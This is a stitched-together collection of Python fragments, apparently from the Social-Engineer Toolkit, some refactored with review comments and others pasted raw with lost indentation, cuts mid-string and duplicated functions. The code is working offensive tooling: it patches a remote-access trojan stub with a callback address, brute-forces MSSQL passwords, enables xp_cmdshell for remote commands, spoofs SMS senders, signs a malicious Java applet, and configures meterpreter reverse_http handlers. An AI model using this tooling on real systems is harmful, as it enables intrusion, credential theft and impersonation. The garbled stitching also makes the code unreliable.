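def prepare_ratte(ipaddr, ratteport, persistent, customexe):
    """Patch the RATTE stub with the callback address and options.

    Reads ``src/payloads/ratte/ratte.binary``, overwrites the placeholder
    fields in it with ``ipaddr``, ``ratteport``, ``persistent`` and
    ``customexe`` (each NUL-terminated) and writes the result to
    ``src/program_junk/ratteM.exe``.

    The stub reserves each field as a run of one marker character
    (``X`` host, ``Y`` port, ``Z`` persistence flag, ``Q`` custom exe) that
    is one byte longer than the value, so value plus terminator fit exactly.
    Only the first run of that exact length is replaced, in the order
    custom exe, persistence, host, port (as in the original).
    """
    core.print_status("preparing RATTE...")
    with open("src/payloads/ratte/ratte.binary", "rb") as fileopen:
        data = fileopen.read()
    patched = _patch_ratte_fields(data, ipaddr, ratteport, persistent, customexe)
    with open("src/program_junk/ratteM.exe", "wb") as filewrite:
        filewrite.write(patched)


def _patch_ratte_fields(data, ipaddr, ratteport, persistent, customexe):
    """Return ``data`` with the RATTE placeholder runs replaced by the values.

    A field is skipped when its value is empty.  The original code only
    guarded ``customexe`` and, even then, still executed
    ``data.replace("", "\\x00", 1)`` for an empty value -- an empty
    pattern matches at offset 0, so that call *inserts* a NUL byte at the
    very start of the binary and shifts the whole image by one byte.  The
    same happened for an empty ``persistent`` value.  All operands are
    normalised to bytes so the replacement also works on Python 3, where
    ``bytes.replace`` rejects ``str`` arguments.
    """
    def _b(value):
        # str is bytes on Python 2; on Python 3 encode the text form.
        if isinstance(value, bytes):
            return value
        return str(value).encode("latin-1")

    fields = (
        ("Q", customexe),
        ("Z", persistent),
        ("X", ipaddr),
        ("Y", ratteport),
    )
    for marker, value in fields:
        value = _b(value)
        if not value:
            continue
        placeholder = _b(marker) * (len(value) + 1)
        data = data.replace(placeholder, value + b"\x00", 1)
    return data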
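def brute(ipaddr, username, port, wordlist):
    """Try each password in ``wordlist`` against an MSSQL server (pymssql ``_mssql``).

    Args:
        ipaddr: target host, optionally ``host:port``; when a port is given
            this way it overrides ``port``.  An empty string returns
            ``False`` immediately.
        username: SQL login to try.
        port: TCP port used when ``ipaddr`` carries none.
        wordlist: path to a newline-separated password file, or the literal
            ``"default"`` for ``src/fasttrack/wordlist.txt``.

    Returns:
        ``"ipaddr,username,port,password"`` for the first password that
        logs in, otherwise ``False`` (after printing a warning).
    """
    if ipaddr == "":
        return False
    if ":" in ipaddr:
        # rsplit so an unexpected extra colon in the host part cannot break
        # the two-value unpacking; the last component is taken as the port.
        ipaddr, port = ipaddr.rsplit(":", 1)
    ipaddr = str(ipaddr)
    port = str(port)
    if wordlist == "default":
        wordlist = "src/fasttrack/wordlist.txt"

    successful_password = None
    with open(wordlist) as passwordlist:
        for password in passwordlist:
            password = password.rstrip()
            print("Attempting to brute force {bold}{ipaddr}:{port}{endc}"
                  " with username of {bold}{username}{endc}"
                  " and password of {bold}{passwords}{endc}".format(ipaddr=ipaddr,
                                                                    username=username,
                                                                    passwords=password,
                                                                    port=port,
                                                                    bold=core.bcolors.BOLD,
                                                                    endc=core.bcolors.ENDC))
            try:
                target_server = _mssql.connect("{0}:{1}".format(ipaddr, port),
                                               username,
                                               password)
            except Exception:
                # A rejected login and an unreachable server both surface as
                # an exception from _mssql.  `Exception` rather than a bare
                # except so Ctrl-C still aborts the run instead of being
                # treated as "wrong password".
                continue
            if target_server:
                core.print_status("\nSuccessful login with username {0} and password: {1}".format(username,
                                                                                                password))
                successful_password = password
                # The connection was only opened to validate the credential;
                # release it rather than leaking the socket.
                try:
                    target_server.close()
                except Exception:
                    pass
                break

    if successful_password is not None:
        return ",".join([ipaddr, username, port, successful_password])
    core.print_warning("Unable to guess the SQL password for {0} with username of {1}".format(ipaddr, username))
    return False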
def _do_sms():
    """Interactive SMS spoofing menu backed by spoofmytextmessage.com.

    Prints the service description and disclaimer; only the literal answer
    ``yes`` continues.  Then collects the account e-mail and (masked)
    password, TO/FROM country codes (defaulting to ``+1``), both numbers
    and the message text, and hands everything to
    ``src.sms.protectedapi.send_sms``.

    NOTE(review): ``send_sms`` ships as a compiled module without source
    (see the comment at its import), so the account password entered here
    leaves this file through code that cannot be reviewed in-tree.
    """
    def ask(text):
        return input(core.setprompt(["7"], text))

    def ask_country(text):
        answer = ask(text)
        return answer if answer else "+1"

    print("""\n ----- The Social-Engineer Toolkit (SET) SMS Spoofing Attack Vector -----\n""")
    print("This attack vector relies upon a third party service called www.spoofmytextmessage.com. "
          "This is a third party service outside of the control from the Social-Engineer Toolkit. "
          "The fine folks over at spoofmytextmessage.com have provided an undocumented API for us "
          "to use in order to allow SET to perform the SMS spoofing. You will need to visit "
          "https://www.spoofmytextmessage.com and sign up for an account. They example multiple "
          "payment methods such as PayPal, Bitcoin, and many more options. Once you purchase your "
          "plan that you want, you will need to remember your email address and password used for "
          "the account. SET will then handle the rest.\n")
    print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
    print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
          "spoofmytextmessage.com\n")
    core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
                     "services from spoofmytextmessage.com and you are fully aware of your countries "
                     "legal stance on SMS spoofing prior to performing any of these. By accepting yes "
                     "you fully acknowledge these terms and will not use them for unlawful purposes.")

    if input("\nDo you accept these terms (yes or no): ") != "yes":
        core.print_status("Okay! Exiting out of the Social-Engineer Toolkit SMS Spoofing Attack Vector...")
        return

    core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
    email = ask("Enter your email address for the spoofmytextmessage.com account")
    core.print_status("Note that the password below will be masked and you will not see the output.")
    # getpass keeps the password off the terminal echo.
    pw = getpass.getpass(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
    core.print_status("The next section requires a country code, this is the code you would use to dial "
                      "to the specific country, for example if I was sending a message to 555-555-5555 to "
                      "the United States (or from) you would enter +1 below.")
    tocountry = ask_country("Enter the country code for the number you are sending TO "
                            "(for example U.S would be '+1')[+1]")
    fromcountry = ask_country("Enter the country code for the number you are sending FROM "
                              "(for example U.S. would be '+1')[+1]")
    tonumber = ask("Enter the number to send the SMS TO - be sure to include "
                   "country code (example: +15551234567)")
    fromnumber = ask("Enter the number you want to come FROM - be sure to include "
                     "country code (example: +15551234567)")
    message = ask("Enter the message you want to send via the text message")

    # The sender lives in a compiled-only module (see original author's note:
    # kept closed at the third party's request because their API is
    # undocumented); it is imported lazily so the rest of SET does not
    # depend on it.
    from src.sms.protectedapi import send_sms
    send_sms(email, pw, tocountry, fromcountry, fromnumber, tonumber, message)
def gen_qrcode(url):
    """Write a QR code for ``url`` to ``<core.setdir>/reports/qrcode_attack.png``.

    Uses the ``qrcode`` package with symbol version 5 and the lowest error
    correction level, deletes any image already at that path, saves the
    new PNG and reports its location via ``core.print_status``.
    """
    target = os.path.join(core.setdir, "reports/qrcode_attack.png")

    code = qrcode.QRCode(5, error_correction=qrcode.constants.ERROR_CORRECT_L)
    code.add_data(url)
    code.make()
    image = code.make_image()

    # One-second pause kept from the original; it appears to be cosmetic only.
    time.sleep(1)

    # Clear the previous run's file so the save below starts from scratch.
    if os.path.isfile(target):
        os.remove(target)
    image.save(target, format='png')
    core.print_status("QRCode has been generated under {0}".format(target))
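def launch():
    """Start msfconsole on the prepared autopwn answer file and hand over the tty.

    The console is spawned with pexpect and the user is dropped into it via
    ``interact()``; any exception raised while spawning is recorded through
    ``core.log`` instead of propagating.

    The original docstring noted that giving msfconsole its full path broke
    its database support and that this was reported upstream; so when
    ``core.meta_path`` is empty, ``msfconsole`` must be reachable on PATH.
    NOTE(review): ``prep()`` in this listing writes
    ``src/program_junk/autopwn.answer`` while this reads
    ``core.userconfigpath``; the two fragments may come from different SET
    versions -- confirm they resolve to the same file.
    """
    core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..")
    try:
        # Join with a separator.  The original did
        # os.path.join(core.meta_path + 'msfconsole'), i.e. plain string
        # concatenation, which yields e.g. '/opt/metasploitmsfconsole' when
        # meta_path has no trailing slash; os.path.join is a no-op when the
        # slash is present, so existing configs are unaffected.
        msfconsole = os.path.join(core.meta_path, 'msfconsole')
        answer_file = os.path.join(core.userconfigpath, "autopwn.answer")
        # Trailing CR/LF pairs retained from the original command string;
        # presumably harmless to pexpect's command splitting.
        child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(msfconsole, answer_file))
        child.interact()
    except Exception as error:
        core.log(error)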
def prep(database, ranges):
    """Write the msfconsole answer file for an autopwn run.

    ``src/program_junk/autopwn.answer`` receives, in order and each
    CRLF-terminated: ``db_driver <database>``, ``db_nmap <ranges>``,
    ``db_autopwn -p -t -e -r``, ``jobs -K`` and ``sessions -l``.  Progress
    is reported through ``core.print_status``.

    ``ranges`` is written verbatim, so whatever the operator typed is
    passed straight to nmap by msfconsole.
    """
    commands = (
        "db_driver {0}".format(database),
        "db_nmap {0}".format(ranges),
        "db_autopwn -p -t -e -r",
        "jobs -K",
        "sessions -l",
    )
    print("\n")
    core.print_status("Prepping the answer file based on what was specified.")
    with open("src/program_junk/autopwn.answer", "w") as answer_file:
        core.print_status("Using the {0} sql driver for autopwn".format(database))
        core.print_status("Autopwn will attack the following systems: {0}".format(ranges))
        # msfconsole resource files are line oriented; keep the CRLF endings
        # the original wrote.
        answer_file.write("".join(line + "\r\n" for line in commands))
    core.print_status("Answer file has been created and prepped for delivery into Metasploit.\n")
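def cmdshell(ipaddr, port, username, password, option):
    """Interactive ``xp_cmdshell`` loop over a pymssql (``_mssql``) connection.

    Connects to ``ipaddr:port`` as ``username``/``password``, makes a
    best-effort attempt to enable ``xp_cmdshell`` via ``sp_configure``
    (failures are ignored: the login may lack the right or it may already
    be enabled), then reads commands from the terminal until ``quit`` or
    ``exit`` and prints the cleaned-up rows each ``xp_cmdshell`` call
    returns.  ``option`` is accepted for signature compatibility and is
    not used here.
    """
    mssql = _mssql.connect(ipaddr + ":" + str(port), username, password)
    setcore.print_status("Connection established with SQL Server...")
    setcore.print_status("Attempting to re-enable xp_cmdshell if disabled...")
    try:
        mssql.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
        mssql.execute_query("RECONFIGURE")
        mssql.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
        mssql.execute_query("RECONFIGURE")
    except Exception:
        # Deliberately best-effort; if xp_cmdshell is still unavailable the
        # first command in the loop below surfaces the real server error.
        pass
    setcore.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
    mssql.select_db('master')

    # Python 2 prompt, with a fallback so the loop also runs under Python 3.
    try:
        read_line = raw_input
    except NameError:
        read_line = input

    # Substrings the original stripped from pymssql's row repr so only the
    # command output remains.
    noise = (
        ("', 'output': '", "\n"),
        ("{0: '", ""),
        ("'}", ""),
        ("{0: None, 'output': None}", ""),
        ("\\r", ""),
        ("The command completed with one or more errors.", ""),
    )

    while True:
        cmd = read_line("xp_cmdshell> ")
        if cmd == "quit" or cmd == "exit":
            break
        if cmd == "":
            # Nothing to run.  The original still sent xp_cmdshell '' here
            # and then discarded the result.
            continue
        # Double any single quote so the command cannot end the T-SQL string
        # literal early (a command such as echo 'hi' broke the query before).
        mssql.execute_query("xp_cmdshell '%s'" % cmd.replace("'", "''"))
        for line in mssql:
            line = str(line)
            for old, new in noise:
                line = line.replace(old, new)
            print(line)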
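def cmdshell(ipaddr, port, username, password, option):
    """Interactive ``xp_cmdshell`` loop over an impacket ``tds.MSSQL`` connection.

    Connects to ``ipaddr:port``, logs in to ``master`` as
    ``username``/``password``, makes a best-effort attempt to enable
    ``xp_cmdshell`` through ``sp_configure`` (errors ignored), then reads
    commands at the ``mssql>`` prompt until ``quit`` or ``exit``.  Each
    non-empty command is run through ``master..xp_cmdshell`` and the
    replies/rows are printed with impacket's helpers.  ``option`` is
    accepted for signature compatibility and is not used here.
    """
    mssql = tds.MSSQL(ipaddr, int(port))
    mssql.connect()
    # NOTE(review): impacket's login() is believed to return False (rather
    # than raise) on a rejected credential; only an explicit False stops us
    # here so a None-returning variant behaves as before.
    if mssql.login("master", username, password) is False:
        core.print_error("Login to the SQL Server failed, check the username and password.")
        return
    core.print_status("Connection established with SQL Server...")
    core.print_status("Attempting to re-enable xp_cmdshell if disabled...")
    try:
        mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;"
                        "RECONFIGURE;"
                        "exec master.dbo.sp_configure 'xp_cmdshell', 1;"
                        "RECONFIGURE;")
    except Exception:
        # Best-effort: the login may lack ALTER SETTINGS or xp_cmdshell may
        # already be on.  `Exception` (not bare) keeps Ctrl-C working.
        pass
    core.print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
    while True:
        cmd = input("mssql>")
        if cmd == "quit" or cmd == "exit":
            break
        if not cmd:
            continue
        # Double single quotes so the command cannot terminate the T-SQL
        # string literal early (e.g. a command containing 'quoted' text).
        mssql.sql_query("exec master..xp_cmdshell '{0}'".format(cmd.replace("'", "''")))
        mssql.printReplies()
        # Widen the output column impacket uses when printing rows.
        mssql.colMeta[0]['TypeData'] = 80 * 2
        mssql.printRows()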
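def brute(ipaddr, username, port, wordlist):
    """Try each password in ``wordlist`` against an MSSQL server (pymssql ``_mssql``).

    Args:
        ipaddr: target host; an empty string returns ``False`` immediately.
        username: SQL login to try.
        port: TCP port of the server.
        wordlist: path to a newline-separated password file, or the literal
            ``"default"`` for ``src/fasttrack/wordlist.txt``.

    Returns:
        ``"ipaddr,username,port,password"`` for the first password that
        logs in, otherwise ``False`` (after printing a warning).
    """
    if ipaddr == "":
        return False
    if wordlist == "default":
        wordlist = "src/fasttrack/wordlist.txt"

    found = None
    # `with open(...)`: the original used the Python 2-only file() builtin
    # and never closed the handle.
    with open(wordlist, "r") as password_file:
        for candidate in password_file:
            candidate = candidate.rstrip()
            print("Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + candidate + setcore.bcolors.ENDC)
            try:
                target_server = _mssql.connect(ipaddr + ":" + str(port), username, candidate)
            except Exception:
                # Rejected login or unreachable server; try the next one.
                continue
            setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, candidate))
            found = candidate
            # The connection only served to validate the credential.
            try:
                target_server.close()
            except Exception:
                pass
            break

    if found is not None:
        return ipaddr + "," + username + "," + str(port) + "," + found
    setcore.print_warning(
        "Unable to guess the SQL password for %s with username of %s" % (ipaddr, username)
    )
    return False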
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
applet_name = core.generate_random_string(6, 15) + ".jar"
core.update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
custom = 1
core.print_status("Note that since you are using a custom payload, you will need to create your OWN listener.")
core.print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.")
core.print_status("If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back.")
# here we need to modify the java applet to recognize custom attribute
with open(os.path.join(core.setdir, "web_clone/index.html")) as fileopen:
data = fileopen.read()
with open(os.path.join(core.setdir, "web_clone/index.html.new"), "w") as filewrite:
# we randomize param name so static sigs cant be used
goat_random = core.generate_random_string(4, 4)
data = data.replace('param name="8" value="YES"', 'param name="8" value="{0}"'.format(goat_random))
filewrite.write(data)
subprocess.Popen("mv {0} {1}".format(os.path.join(core.setdir, "web_clone/index.html.new"),
"plan that you want, you will need to remember your email address and password used for "
"the account. SET will then handle the rest.\n")
print("In order for this to work you must have an account over at spoofmytextmessage.com\n")
print("Special thanks to Khalil @sehnaoui for testing out the service for me and finding "
"spoofmytextmessage.com\n")
core.print_error("DISCLAIMER: By submitting yes, you understand that you accept all terms and "
"services from spoofmytextmessage.com and you are fully aware of your countries "
"legal stance on SMS spoofing prior to performing any of these. By accepting yes "
"you fully acknowledge these terms and will not use them for unlawful purposes.")
message = input("\nDo you accept these terms (yes or no): ")
if message == "yes":
core.print_status("Okay! Moving on - SET needs some information from you in order to spoof the message.")
email = input(core.setprompt(["7"], "Enter your email address for the spoofmytextmessage.com account"))
pw = input(core.setprompt(["7"], "Enter your password for the spoofmytextmessage.com account"))
core.print_status("The next section requires a country code, this is the code you would use to dial "
"to the specific country, for example if I was sending a message to 555-555-5555 to "
"the United States (or from) you would enter +1 below.")
tocountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending TO "
"(for example U.S would be '+1')[+1]"))
if tocountry == "":
tocountry = "+1"
fromcountry = input(core.setprompt(["7"], "Enter the country code for the number you are sending FROM "
"(for example U.S. would be '+1')[+1]"))
if fromcountry == "":
fromcountry = "+1"
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
#prep_powershell_payload()
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
#.........这里部分代码省略.........
# added to set 07/27/2012
strSMSServer = "{0}"
strPackageID = "{1}"
Set objLoc = CreateObject("WbemScripting.SWbemLocator")
Set objSMS= objLoc.ConnectServer(strSMSServer, "root\sms")
Set Results = objSMS.ExecQuery _
("SELECT * From SMS_ProviderLocation WHERE ProviderForLocalSite = true")
For each Loc in Results
If Loc.ProviderForLocalSite = True Then
Set objSMS2 = objLoc.ConnectServer(Loc.Machine, "root\sms\site_"& _
Loc.SiteCode)
strSMSSiteCode = Loc.SiteCode
end if
Next
Set objPkgs = objSMS2.ExecQuery("select * from SMS_Package where PackageID = '" & strPackageID & "'")
for each objPkg in objPkgs
objPkg.RefreshPkgSource(0)
Next
'''.format(sms_server, package_id)
# write out the file to reports
with open(os.path.join(core.userconfigpath, "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.")
core.print_status("Report has been exported to {0}".format(os.path.join(core.definepath, "reports/sccm_configuration.txt")))
pause = input("Press " + core.bcolors.RED + "{return} " + core.bcolors.ENDC + "to exit this menu.")
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
"""
setcore.print_error("*** WARNING ***")
setcore.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
setcore.print_error("*** WARNING ***")
# random string used to generate signature of java applet
random_string = setcore.generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" % (random_string), shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" % (random_string), shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar ../../program_junk/", shell=True)
# move back to original directory
os.chdir("../../../")
setcore.print_status("Java Applet is now signed and will be imported into the website")
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
enabled.\n""")
# grab the path and filename from user
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
output_variable = "/*\nTeensy Hex to File SDCard Created by Josh Kelley (winfang) and Dave Kennedy (ReL1K)\n" \
"Reading from a SD card. Based on code from: http://arduino.cc/en/Tutorial/DumpFile\n*/\n\n"
# this is used to write out the file
random_filename = core.generate_random_string(8, 15) + ".txt"
def prep_powershell_payload():
# grab stage encoding flag
stage_encoding = core.check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
# check to see if we are just generating powershell code
powershell_solo = core.check_options("POWERSHELL_SOLO")
# check if port is there
port = core.check_options("PORT=")
# check if we are using auto_migrate
auto_migrate = core.check_config("AUTO_MIGRATE=")
# check if we are using pyinjection
pyinjection = core.check_options("PYINJECTION=")
if pyinjection == "ON":
# check to ensure that the payload options were specified right
if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
pyinjection = "on"
core.print_status("Multi/Pyinjection was specified. Overriding config options.")
else:
pyinjection = "off"
# grab ipaddress
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter the ipaddress for the reverse connection: ")
core.update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()
# turn off multi injection if pyinjection is specified
if pyinjection == "on":
multi_injection = "off"
# check what payloads we are using
powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if not core.validate_ip(ipaddr):
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443"
with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
data = fileopen.read()
match = re.search(port, data)
if not match:
with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set EnableStageEncoding {3}\n"
"set ExitOnSession false\n"
"exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))
# if we have multi injection on, don't worry about these
if multi_injection != "on" and pyinjection == "off":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
# if port.options isnt there then prompt
else:
port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
# turn off multi_injection if we are riding solo from the powershell menu
if powershell_solo == "ON":
multi_injection = "off"
pyinjection = "on"
# if we are using multi powershell injection
if multi_injection == "on" and pyinjection == "off":
core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x86 = ""
# specify a list we will use for later
multi_injection_x86 = ""
#.........这里部分代码省略.........